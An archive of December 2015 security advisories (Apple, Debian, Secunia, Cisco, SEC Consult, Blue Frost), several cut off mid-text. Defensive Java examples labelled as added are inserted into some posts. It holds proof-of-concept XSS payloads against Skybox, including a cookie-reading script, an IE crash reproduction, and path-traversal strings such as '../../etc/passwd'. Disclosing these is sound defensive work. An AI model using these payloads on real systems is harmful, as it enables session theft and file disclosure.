CVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP's Zero
Day Initiative

GasGauge
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-6979 : PanguTeam

ImageIO
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Processing a maliciously crafted image may lead to arbitrary
code execution
Description:  A memory corruption issue existed in ImageIO. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7053 : Apple

IOHIDFamily
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple memory corruption issues existed in
IOHIDFamily. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-7111 : beist and ABH of BoB
CVE-2015-7112 : Ian Beer of Google Project Zero

IOKit SCSI
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with kernel privileges
Description:  A null pointer dereference existed in the handling of a
certain userclient type. This issue was addressed through improved
validation.
CVE-ID
CVE-2015-7068 : Ian Beer of Google Project Zero

Kernel
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A local application may be able to cause a denial of service
Description:  Multiple denial of service issues were addressed
through improved memory handling.
CVE-ID
CVE-2015-7040 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7041 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7042 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7043 : Tarjei Mandt (@kernelpool)

Kernel
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A local user may be able to execute arbitrary code with
kernel privileges
Description:  An issue existed in the parsing of mach messages. This
issue was addressed through improved validation of mach messages.
CVE-ID
CVE-2015-7047 : Ian Beer of Google 

[SECURITY] [DSA 3414-1] xen security update

2015-12-10 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

- -
Debian Security Advisory DSA-3414-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
December 09, 2015 https://www.debian.org/security/faq
- -

Package: xen
CVE ID : CVE-2015-3259 CVE-2015-3340 CVE-2015-5307 CVE-2015-6654 
 CVE-2015-7311 CVE-2015-7812 CVE-2015-7813 CVE-2015-7814
 CVE-2015-7969 CVE-2015-7970 CVE-2015-7971 CVE-2015-7972
 CVE-2015-8104

Multiple security issues have been found in the Xen virtualisation
solution, which may result in denial of service or information
disclosure.

For the oldstable distribution (wheezy), an update will be provided
later.

For the stable distribution (jessie), these problems have been fixed in
version 4.4.1-9+deb8u3.

For the unstable distribution (sid), these problems will be fixed soon.

We recommend that you upgrade your xen packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v2
-END PGP SIGNATURE-



Secunia Research: Microsoft Windows usp10.dll "GetFontDesc()" Integer Underflow Vulnerability

2015-12-10 Thread Secunia Research
== 
 
Secunia Research 08/12/2015  

 Microsoft Windows usp10.dll "GetFontDesc()"
  Integer Underflow Vulnerability

== 
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Secunia
9) Verification

== 
1) Affected Software


* Microsoft Windows 7
* Microsoft Windows Server 2008

== 
2) Severity 

Rating: Highly critical
Impact: System Access
Where:  From remote
 
== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Windows,
which can be exploited by malicious people to compromise a user's
system.

The vulnerability is caused by an integer underflow error within the
"GetFontDesc()" function in usp10.dll when processing a font file's
cmap table. It can be exploited to cause a heap-based buffer overflow
via a font file whose cmap table contains an encoding record with a
specially crafted offset.

Successful exploitation allows execution of arbitrary code.
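As an added illustration (not Secunia's or Microsoft's code, and not a reconstruction of GetFontDesc(), whose exact arithmetic the advisory does not publish), the following Java parser walks the encoding records of a cmap table with the bounds check that an offset-driven underflow needs. The layout it relies on (u16 version, u16 numTables, then 8-byte records of u16 platformID, u16 encodingID, u32 subtableOffset, all offsets relative to the start of the cmap table, and a u16 format / u16 length subtable header for formats 0, 2, 4 and 6) is the public OpenType format. The sample table is constructed inline, and unsignedRemaining() only emulates the 32-bit unsigned subtraction (tableLength - offset) that a native parser might perform; that it wraps for an out-of-range offset is the point.

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.util.ArrayList;
import java.util.List;

public final class CmapOffsetCheck {
    private static final int HEADER_LEN = 4;          // u16 version + u16 numTables
    private static final int RECORD_LEN = 8;          // u16 platformID + u16 encodingID + u32 subtableOffset
    private static final int SUBTABLE_HEADER_LEN = 4; // u16 format + u16 length (formats 0, 2, 4, 6)

    public static final class MalformedCmapException extends Exception {
        MalformedCmapException(String msg) { super(msg); }
    }

    /** An encoding record whose subtable lies entirely inside the table. */
    public record Subtable(int platformId, int encodingId, long offset, int format, int length) {}

    /**
     * Emulation (assumption, not the real usp10.dll code) of what an unchecked
     * native parser computes for "bytes left after the subtable offset":
     * 32-bit unsigned (tableLength - offset). For an offset past the end of
     * the table this wraps to a value near 4 GiB, and a copy or loop bounded
     * by it runs off the end of the heap buffer.
     */
    public static long unsignedRemaining(int tableLength, long offset) {
        return Integer.toUnsignedLong((int) (tableLength - offset));
    }

    /** Walk the encoding records, rejecting any offset or length that leaves the table. */
    public static List<Subtable> parse(byte[] cmap) throws MalformedCmapException {
        int tableLength = cmap.length;
        if (tableLength < HEADER_LEN) {
            throw new MalformedCmapException("table shorter than header");
        }
        ByteBuffer buf = ByteBuffer.wrap(cmap).order(ByteOrder.BIG_ENDIAN);
        int numTables = Short.toUnsignedInt(buf.getShort(2));
        // long arithmetic so that numTables * RECORD_LEN cannot wrap an int
        long recordsEnd = HEADER_LEN + (long) numTables * RECORD_LEN;
        if (recordsEnd > tableLength) {
            throw new MalformedCmapException("encoding records overrun table");
        }
        List<Subtable> out = new ArrayList<>();
        for (int i = 0; i < numTables; i++) {
            int rec = HEADER_LEN + i * RECORD_LEN;
            int platformId = Short.toUnsignedInt(buf.getShort(rec));
            int encodingId = Short.toUnsignedInt(buf.getShort(rec + 2));
            long offset = Integer.toUnsignedLong(buf.getInt(rec + 4)); // u32, never negative
            // The check whose absence lets (tableLength - offset) wrap:
            if (offset > tableLength - SUBTABLE_HEADER_LEN) {
                throw new MalformedCmapException("record " + i + ": offset " + offset
                        + " outside " + tableLength + "-byte table");
            }
            int format = Short.toUnsignedInt(buf.getShort((int) offset));
            if (format != 0 && format != 2 && format != 4 && format != 6) {
                throw new MalformedCmapException("record " + i + ": format " + format
                        + " not handled by this example");
            }
            int length = Short.toUnsignedInt(buf.getShort((int) offset + 2));
            if (length < SUBTABLE_HEADER_LEN || offset + length > tableLength) {
                throw new MalformedCmapException("record " + i + ": subtable length " + length
                        + " overruns table");
            }
            out.add(new Subtable(platformId, encodingId, offset, format, length));
        }
        return out;
    }

    /** Constructed input: header, one Windows/Unicode-BMP record, and a bare format-4 subtable header. */
    static byte[] buildTable(long subtableOffset, int subtableLength) {
        ByteBuffer buf = ByteBuffer.allocate(HEADER_LEN + RECORD_LEN + 32).order(ByteOrder.BIG_ENDIAN);
        buf.putShort((short) 0).putShort((short) 1);                              // version 0, one record
        buf.putShort((short) 3).putShort((short) 1).putInt((int) subtableOffset); // platform 3, encoding 1
        buf.putShort((short) 4).putShort((short) subtableLength);                 // format 4, length; body left zeroed
        return buf.array();
    }

    public static void main(String[] args) throws Exception {
        byte[] good = buildTable(HEADER_LEN + RECORD_LEN, 32);
        System.out.println("well-formed: " + parse(good));

        long craftedOffset = 0x10000L; // well past the 44-byte table
        byte[] crafted = buildTable(craftedOffset, 32);
        System.out.println("unchecked remaining = " + unsignedRemaining(crafted.length, craftedOffset)
                + " bytes (wrapped)");
        try {
            parse(crafted);
        } catch (MalformedCmapException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Every comparison is done on the u32 offset widened to a long and on the table length known from the caller, never on a difference computed from the offset; that is the discipline that keeps this class of bug out of a parser regardless of language.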

== 
4) Solution 

Apply the update provided in Microsoft Security Bulletin MS15-130.

== 
5) Time Table

09/10/2015 - Vendor notified.
12/10/2015 - Vendor response.
17/10/2015 - Status update provided by the vendor.
28/10/2015 - Vendor provides December 2015 as intended fix date.
08/12/2015 - Release of vendor patch and public disclosure.

== 
6) Credits 

Discovered by Hossein Lotfi, Secunia Research (now part of
Flexera Software).

== 
7) References


The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2015-6130 identifier for the vulnerability.
 
== 
8) About Secunia (now part of Flexera Software)

In September 2015, Secunia was acquired by Flexera Software:

https://secunia.com/blog/435/

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/products/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to help improve the
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/company/jobs/

== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2015-6/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


APPLE-SA-2015-12-08-6 Xcode 7.2

2015-12-10 Thread Apple Product Security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-6 Xcode 7.2

Xcode 7.2 is now available and addresses the following:

Git
Available for:  OS X Yosemite v10.10.5 or later
Impact:  Multiple vulnerabilities existed in Git
Description:  Multiple vulnerabilities existed in Git versions prior
to 2.5.4. These were addressed by updating Git to version 2.5.4.
CVE-ID
CVE-2015-7082

IDE SCM
Available for:  OS X Yosemite v10.10.5 or later
Impact:  Intentionally untracked files may be uploaded to
repositories
Description:  Xcode did not honor the .gitignore file. This issue was
addressed by adding support for honoring the .gitignore file.
CVE-ID
CVE-2015-7056 : Stephen Lardieri

otools
Available for:  OS X Yosemite v10.10.5 or later
Impact:  A local attacker may be able to cause unexpected application
termination or arbitrary code execution
Description:  Multiple memory corruption issues existed in the
processing of mach-o files. These issues were addressed through
improved memory handling.
CVE-ID
CVE-2015-7049 : Proteas of Qihoo 360 Nirvan Team
CVE-2015-7057 : Proteas of Qihoo 360 Nirvan Team

Installation note:

Xcode 7.2 may be obtained from:
https://developer.apple.com/xcode/downloads/

To check that Xcode has been updated:

* Select Xcode in the menu bar
* Select About Xcode
* The version after applying this update will be "7.2".

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-BEGIN PGP SIGNATURE-
Comment: GPGTools - https://gpgtools.org
-END PGP SIGNATURE-



Cisco Security Advisory: Vulnerability in Java Deserialization Affecting Cisco Products

2015-12-10 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Security Advisory: Vulnerability in Java Deserialization Affecting Cisco 
Products

Advisory ID: cisco-sa-20151209-java-deserialization

Revision 1.0

For Public Release: 2015 December 9 16:00  GMT
+-

Summary
===

A vulnerability in the Java deserialization used by the Apache Commons 
Collections (ACC) library could allow an unauthenticated, remote attacker to 
execute arbitrary code.

The vulnerability is due to insecure deserialization of user-supplied content 
by the affected software. An attacker could exploit this vulnerability by 
submitting crafted input to an application on a targeted system that uses the 
ACC library. After the vulnerable library on the affected system deserializes 
the content, the attacker could execute arbitrary code on the system, which 
could be used to conduct further attacks.

On November 6, 2015, Foxglove Security published information about a 
remote code execution vulnerability that affects multiple releases of the ACC 
library. The report contains detailed proof-of-concept code for a number of 
applications, including WebSphere Application Server, JBoss, Jenkins, OpenNMS, 
and WebLogic. The vulnerability is remotely exploitable and allows an attacker 
to execute arbitrary code or commands on the server. The potential impact 
ranges from disclosure of sensitive information to full compromise of the 
system.

Object serialization is a technique that many programming languages use to 
convert an object into a sequence of bytes for storage or transfer. 
Deserialization reassembles those bytes back into an object. This 
vulnerability occurs in Java object serialization for network transport 
and object deserialization on the receiving side.

Many applications accept serialized objects from the network without performing 
input validation checks before deserializing them. Because the receiving side 
instantiates whatever classes the stream names, crafted serialized objects can 
lead to execution of arbitrary attacker code.

Although the problem itself is in the serialization and deserialization 
functionality of the Java programming language, the ACC library is known to be 
affected by this vulnerability. Any application or application framework could 
be vulnerable if it uses the ACC library and deserializes arbitrary, 
user-supplied Java serialized data.
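The following Java example is added here and is not Cisco's, Apache's or any affected product's code. It contrasts the unchecked readObject() pattern the advisory describes with look-ahead deserialization: an ObjectInputStream subclass that rejects every class descriptor not on an allowlist before any instance is constructed. OrderRequest and its allowlist are hypothetical; the hostile payload is a plain HashMap standing in for a gadget chain, since any class off the list is rejected in the same place and for the same reason.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.Serializable;
import java.util.HashMap;
import java.util.Set;

public final class DeserializationAllowlist {

    /** The one type this hypothetical service expects on the wire. */
    public static final class OrderRequest implements Serializable {
        private static final long serialVersionUID = 1L;
        final String sku;
        final int quantity;
        OrderRequest(String sku, int quantity) { this.sku = sku; this.quantity = quantity; }
        @Override public String toString() { return "OrderRequest[" + sku + " x" + quantity + "]"; }
    }

    /**
     * The vulnerable pattern: readObject() reconstructs whatever object graph
     * the stream names before the cast is evaluated, so a gadget chain has
     * already run by the time the ClassCastException is thrown.
     */
    public static OrderRequest readUnchecked(byte[] wire) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(wire))) {
            return (OrderRequest) in.readObject();
        }
    }

    /**
     * Look-ahead deserialization: resolveClass() is invoked for each class
     * descriptor as it is read, before an instance exists, so anything off
     * the allowlist fails before any constructor or readObject() hook runs.
     */
    public static final class AllowlistObjectInputStream extends ObjectInputStream {
        private final Set<String> allowed;

        public AllowlistObjectInputStream(InputStream in, Set<String> allowed) throws IOException {
            super(in);
            this.allowed = allowed;
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
            if (!allowed.contains(desc.getName())) {
                throw new InvalidClassException(desc.getName(), "class not on the deserialization allowlist");
            }
            return super.resolveClass(desc);
        }

        /** Dynamic proxies bypass resolveClass(); refuse them outright. */
        @Override
        protected Class<?> resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {
            throw new InvalidClassException("dynamic proxy classes are not accepted");
        }
    }

    private static final Set<String> ALLOWED = Set.of(OrderRequest.class.getName());

    public static OrderRequest readChecked(byte[] wire) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new AllowlistObjectInputStream(new ByteArrayInputStream(wire), ALLOWED)) {
            return (OrderRequest) in.readObject();
        }
    }

    /** Produces wire bytes for the demo; an attacker would craft these directly. */
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        byte[] legitimate = serialize(new OrderRequest("SKU-42", 3)); // constructed sample
        System.out.println("allowlist accepts: " + readChecked(legitimate));

        // Stand-in for a gadget-chain payload: any class that is not OrderRequest.
        byte[] hostile = serialize(new HashMap<String, String>());
        try {
            readUnchecked(hostile);
        } catch (ClassCastException e) {
            System.out.println("unchecked: object graph was fully built; the cast failed only afterwards");
        }
        try {
            readChecked(hostile);
        } catch (InvalidClassException e) {
            System.out.println("allowlist rejects: " + e.getMessage());
        }
    }
}
```

The allowlist must name every class in the legitimate object graph, including array and nested types, or valid input will be refused; that is the intended failure mode, since a silently widened list is how gadget classes such as the ACC ones get back in. Java 9 (and 8u121) added ObjectInputFilter and the jdk.serialFilter property, which express the same policy without subclassing; for an application you cannot modify, the advisory's statement that no workaround exists stands, and the fix is the vendor's update.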

Additional details about the vulnerability are available at the following links:

Official Vulnerability Note from CERT:
http://www.kb.cert.org/vuls/id/576313

Foxglove Security:
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

Apache Commons Statement:
https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread

Oracle Security Alert:
https://blogs.oracle.com/security/entry/security_alert_cve_2015_4852

Cisco will release software updates that address this vulnerability. There are 
no workarounds that mitigate this vulnerability.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization

-BEGIN PGP SIGNATURE-
Comment: GPGTools - http://gpgtools.org
-END PGP SIGNATURE-


APPLE-SA-2015-12-08-3 OS X El Capitan 10.11.2 and Security Update 2015-008

2015-12-10 Thread Apple Product Security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-3 OS X El Capitan 10.11.2 and Security Update 2015-008

OS X El Capitan 10.11.2 and Security Update 2015-008 is now available
and addresses the following:

apache_mod_php
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  Multiple vulnerabilities in PHP
Description:  Multiple vulnerabilities existed in PHP versions prior
to 5.5.29, the most serious of which may have led to remote code
execution. These were addressed by updating PHP to version 5.5.30.
CVE-ID
CVE-2015-7803
CVE-2015-7804

AppSandbox
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A malicious application may maintain access to Contacts
after having access revoked
Description:  An issue existed in the sandbox's handling of hard
links. This issue was addressed through improved hardening of the app
sandbox.
CVE-ID
CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University
POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North
Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi
of TU Darmstadt

Bluetooth
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A local user may be able to execute arbitrary code with
system privileges
Description:  A memory corruption issue existed in the Bluetooth HCI
interface. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7108 : Ian Beer of Google Project Zero

CFNetwork HTTPProtocol
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  An attacker with a privileged network position may be able
to bypass HSTS
Description:  An input validation issue existed within URL
processing. This issue was addressed through improved URL validation.
CVE-ID
CVE-2015-7094 : Tsubasa Iinuma (@llamakko_cafe) of Gehirn Inc. and
Muneaki Nishimura (nishimunea)

Compression
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  An uninitialized memory access issue existed in zlib.
This issue was addressed through improved memory initialization and
additional validation of zlib streams.
CVE-ID
CVE-2015-7054 : j00ru

Configuration Profiles
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A local attacker may be able to install a configuration
profile without admin privileges
Description:  An issue existed when installing configuration
profiles. This issue was addressed through improved authorization
checks.
CVE-ID
CVE-2015-7062 : David Mulder of Dell Software

CoreGraphics
Available for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,
OS X El Capitan v10.11 and v10.11.1
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team

CoreMedia Playback
Available for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,
OS X El Capitan v10.11 and v10.11.1
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  Multiple memory corruption issues existed in the
processing of malformed media files. These issues were addressed
through improved memory handling.
CVE-ID
CVE-2015-7074 : Apple
CVE-2015-7075

Disk Images
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A local user may be able to execute arbitrary code with
kernel privileges
Description:  A memory corruption issue existed in the parsing of
disk images. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-7110 : Ian Beer of Google Project Zero

EFI
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A local user may be able to execute arbitrary code with
system privileges
Description:  A path validation issue existed in the kernel loader.
This was addressed through improved environment sanitization.
CVE-ID
CVE-2015-7063 : Apple

File Bookmark
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A sandboxed process may be able to circumvent sandbox
restrictions
Description:  A path validation issue existed in app scoped
bookmarks. This was addressed through improved environment
sanitization.
CVE-ID
CVE-2015-7071 : Apple

Hypervisor
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  A local user may be able to execute arbitrary code with
system privileges
Description:  A use after free issue existed in the handling of VM
objects. This issue was addressed through improved memory management.
CVE-ID
CVE-2015-7078 : Ian Beer of Google Project Zero

iBooks
Available for:  OS X El Capitan v10.11 and v10.11.1
Impact:  Parsing a maliciously crafted iBooks file may lead to
disclosure of user information
Description:  An XML external entity reference issue existed with
iBook parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-7081 : Behrouz Sadeghipour (@Nahamsec) and 

SEC Consult SA-20151210-0 :: Skybox Platform Multiple Vulnerabilities

2015-12-10 Thread SEC Consult Vulnerability Lab
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

SEC Consult Vulnerability Lab Security Advisory < 20151210-0 >
===
              title: Multiple Vulnerabilities
            product: Skybox Platform
 vulnerable version: <=7.0.611
      fixed version: 7.5.401
         CVE number:
             impact: Critical
           homepage: www.skyboxsecurity.com/products/appliance
              found: 2014-12-04
                 by: K. Gudinavicius, M. Heinzl, C. Schwarz (Office Singapore)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
===

Vendor description:
- ---
"Skybox Security provides cutting-edge risk analytics for enterprise security
management. Our solutions give you complete network visibility, help you
eliminate attack vectors, and optimize your security management processes.
Protect the network and the business."
Source: http://www.skyboxsecurity.com/

Business recommendation:
- 
Attackers are able to perform Cross-Site Scripting and SQL Injection attacks
against the Skybox platform. Furthermore, it is possible for
unauthenticated attackers to download arbitrary files and execute arbitrary
code.

SEC Consult recommends that the vendor conduct a comprehensive security
analysis, based on security source code reviews, in order to identify all
remaining vulnerabilities in the Skybox platform and increase the security
of its customers.

Vulnerability overview/description:
- ---
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
2) Multiple Stored Cross-Site Scripting Vulnerabilities
3) Arbitrary File Download and Directory Traversal Vulnerability
4) Blind SQL Injection Vulnerability
5) Remote Unauthenticated Code Execution

Proof of concept:
- -
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
Multiple scripts are prone to reflected Cross-Site Scripting attacks.
The following example demonstrates this issue with the
service VersionRepositoryWebService:

POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0
Content-type: text/plain
User-Agent: Axis/1.4
Host: localhost:8282
SOAPAction: ""
Content-Length: 863
http://schemas.xmlsoap.org/soap/envelope/;
xmlns:xsd="http://www.w3.org/2001/XMLSchema;
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance;>http://schemas.xmlsoap.org/soap/encoding/;
xmlns:ns1="http://com/skybox/view/webservice/versionrepositoryc4f85
t;a
xmlns:a=http://www.w3.org/1999/xhtmla:body
onload=alert(1)//a9884933253b">http://schemas.xmlsoap.org/soap/encoding/;>Applicationhttp://schemas.xmlsoap.org/soap/encoding/;>windows-64http://schemas.xmlsoap.org/soap/encoding/;>7.0.601

Other scripts and parameters, such as the status parameter of the login script
(located at https://localhost:444/login.html), are affected as well. The
following request demonstrates this issue:
https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

2) Multiple Stored Cross-Site Scripting Vulnerabilities
Multiple fields of the Skybox Change Manager, which can be accessed at
https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting
attacks. For example, when creating a new ticket, the title field can be used
to inject JavaScript code. The following request to the server demonstrates
the issue:

Request:
POST /skyboxview/webskybox/tickets HTTP/1.1
Host: localhost:8443
[...]
7|0|18|https://localhost:8443/skyboxview/webskybox/|2725E|com.skybox.view.g
wt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.trans
fer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer
.modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phas
es.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer.
netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.vi
ew.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel.
TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItem
Id/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/8
52682809||skyboxview|test">|java.util.ArrayList/41

Other fields, like "Comments" and "Description", are affected as well.

3) Arbitrary File Download and Directory Traversal Vulnerability
Skybox Change Manager allows uploading and downloading attachments for tickets.
The download functionality can be exploited to download arbitrary files from
the appliance. No authentication is required to exploit this vulnerability.
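As an added example (hypothetical code, not Skybox's), the following Java class shows how an attachment download handler can confine a client-supplied file name to the attachment directory: it normalises the joined path, resolves symlinks with toRealPath(), and checks both results against the canonical root. The sample attachment and the hostile names are constructed inline. The missing authentication check the advisory notes is a separate control that must run before the name is even looked at.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public final class AttachmentDownload {
    private final Path root; // canonical attachment directory

    public AttachmentDownload(Path attachmentRoot) throws IOException {
        // Canonicalise once so later startsWith() comparisons are against the real directory.
        this.root = attachmentRoot.toRealPath();
    }

    /** The vulnerable pattern: whatever the client sends is joined to the root and served. */
    public Path resolveUnchecked(String clientName) {
        return root.resolve(clientName);
    }

    /** Hardened resolution: the returned path is a regular file inside the root, symlinks included. */
    public Path resolveChecked(String clientName) throws IOException {
        if (clientName.isEmpty() || clientName.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("empty or NUL-containing name");
        }
        // resolve() of an absolute name yields that absolute path; normalize() folds "..".
        // Path.startsWith() compares whole components, so "/srv/att" never matches "/srv/attachments".
        Path candidate = root.resolve(clientName).normalize();
        if (!candidate.startsWith(root)) {
            throw new IllegalArgumentException("path escapes attachment directory");
        }
        // toRealPath() follows symlinks and fails if the file does not exist,
        // so a link planted inside the directory cannot point outside it.
        Path real = candidate.toRealPath();
        if (!real.startsWith(root) || !Files.isRegularFile(real)) {
            throw new IllegalArgumentException("not a regular file inside attachment directory");
        }
        return real;
    }

    public static void main(String[] args) throws Exception {
        Path root = Files.createTempDirectory("attachments"); // constructed sample store
        Files.writeString(root.resolve("ticket-1.txt"), "constructed attachment body");
        AttachmentDownload dl = new AttachmentDownload(root);

        System.out.println("served: " + dl.resolveChecked("ticket-1.txt"));
        String[] hostile = {"../../etc/passwd", "/etc/passwd", "sub/../../../etc/hostname"};
        for (String name : hostile) {
            System.out.println("unchecked would open: " + dl.resolveUnchecked(name));
            try {
                dl.resolveChecked(name);
            } catch (IllegalArgumentException | IOException e) {
                System.out.println("rejected " + name + ": " + e.getMessage());
            }
        }
    }
}
```

Checking the normalised path before touching the filesystem keeps the handler from leaking existence information for paths outside the root, and checking the real path afterwards is what closes the symlink case that a string-only filter misses.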

BFS-SA-2015-003: Internet Explorer CObjectElement Use-After-Free Vulnerability

2015-12-10 Thread Blue Frost Security Research Lab
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/   research(at)bluefrostsecurity.de
BFS-SA-2015-003 10-December-2015


Vendor: Microsoft, http://www.microsoft.com
Affected Products:  Internet Explorer
Affected Version:   IE 11
Vulnerability:  MSHTML!CObjectElement Use-After-Free Vulnerability
CVE ID: CVE-2015-6152


I.   Impact

This vulnerability allows the execution of arbitrary code on vulnerable
installations of Microsoft Internet Explorer. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page or
open a malicious file.



II.  Vulnerability Details

Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in
the MSHTML!CTreeNode::ComputeFormatsHelper function. The analysis was performed
on Internet Explorer 11 running on Windows 7 SP1 (x64).

The following HTML page can be used to reproduce the issue:





small{ -ms-block-progression: lr; -ms-filter: "vv"; }


function trigger() { document.execCommand("JustifyLeft"); }

bluefrost
security
trigger();


With page heap enabled and the Memory Protect feature turned off, visiting
that page results in the following crash:

(2d4.830): Access violation - code c0000005 (!!! second chance !!!)
eax=09b09e90 ebx=125b4e60 ecx= edx=6e9fedf0 esi=0f552fa0 edi=0f552fa0
eip=6dfcc19b esp=097fb520 ebp=097fc1f0 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
MSHTML!CTreeNode::ComputeFormatsHelper+0x53:
6dfcc19b f740240300  test    dword ptr [eax+24h],3h 
ds:002b:09b09eb4=

0:007> !heap -p -a @eax
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in free-ed allocation (  DPH_HEAP_BLOCK: VirtAddr VirtSize)
9b01f04:  9b09000 2000
748090b2 verifier!AVrfDebugPageHeapFree+0x00c2
77e61b1c ntdll!RtlDebugFreeHeap+0x002f
77e1ae8a ntdll!RtlpFreeHeap+0x005d
77dc2b65 ntdll!RtlFreeHeap+0x0142
